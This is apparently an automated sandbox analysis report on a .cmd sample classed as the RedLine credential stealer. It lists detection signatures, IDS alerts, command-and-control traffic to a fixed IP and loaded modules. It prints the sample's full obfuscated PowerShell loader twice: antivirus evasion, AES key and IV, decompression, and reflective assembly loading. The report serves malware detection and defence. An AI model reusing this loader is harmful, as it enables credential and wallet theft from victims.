Windows Analysis Report
z52PO0048857.cmd

Overview

General Information

Sample name: z52PO0048857.cmd
Analysis ID: 1535306
MD5: 832dd29f7ffd54f656233e56c588b4fd
SHA1: fd306aaaa8b2065f80773cf440e245f3120eef09
SHA256: 3868b32b9aeabdd021b9f5d029a741304def18fa3c19a0fe4872e82939aac02d
Tags: cmduser-Porcupine
Infos:

Detection

RedLine
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection

barindex
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability

Networking

barindex
Source: Network traffic Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.8:49705 -> 51.195.145.77:57942
Source: Network traffic Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.8:49704 -> 51.195.145.77:57942
Source: Network traffic Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 51.195.145.77:57942 -> 192.168.2.8:49704
Source: Network traffic Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.8:49707 -> 51.195.145.77:57942
Source: Network traffic Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 51.195.145.77:57942 -> 192.168.2.8:49705
Source: Network traffic Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 51.195.145.77:57942 -> 192.168.2.8:49705
Source: global traffic TCP traffic: 51.195.145.77 ports 57942,2,4,5,7,9
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 49707
Source: global traffic TCP traffic: 192.168.2.8:49704 -> 51.195.145.77:57942
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 51.195.145.77:57942Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 51.195.145.77:57942Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 51.195.145.77:57942Content-Length: 959963Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 51.195.145.77:57942Content-Length: 959955Expect: 100-continueAccept-Encoding: gzip, deflate
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.145.77
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 51.195.145.77:57942Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.1448410913.00000000077CB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000005.00000002.1445238637.00000000051D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1445238637.00000000051F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpEA92.tmp.3.dr, tmpEB35.tmp.3.dr, tmpEA52.tmp.3.dr, tmpEB65.tmp.3.dr, tmpEAD4.tmp.3.dr, tmpEAC3.tmp.3.dr, tmpEAA3.tmp.3.dr, tmpEB34.tmp.3.dr, tmpEB04.tmp.3.dr, tmpEB14.tmp.3.dr, tmpEA62.tmp.3.dr, tmpEB66.tmp.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2298
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2298 Jump to behavior
Source: classification engine Classification label: mal96.troj.spyw.evad.winCMD@8/51@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Yandex Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2352:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4czvfbzv.1zw.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: tmpE9FF.tmp.3.dr, tmpEA30.tmp.3.dr, tmpEB88.tmp.3.dr, tmpEB89.tmp.3.dr, tmpEA20.tmp.3.dr, tmpEB77.tmp.3.dr, tmpEA0F.tmp.3.dr, tmpEB9A.tmp.3.dr, tmpEB99.tmp.3.dr, tmpE9EE.tmp.3.dr, tmpEBAB.tmp.3.dr, tmpEA41.tmp.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: powershell.exe String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z52PO0048857.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
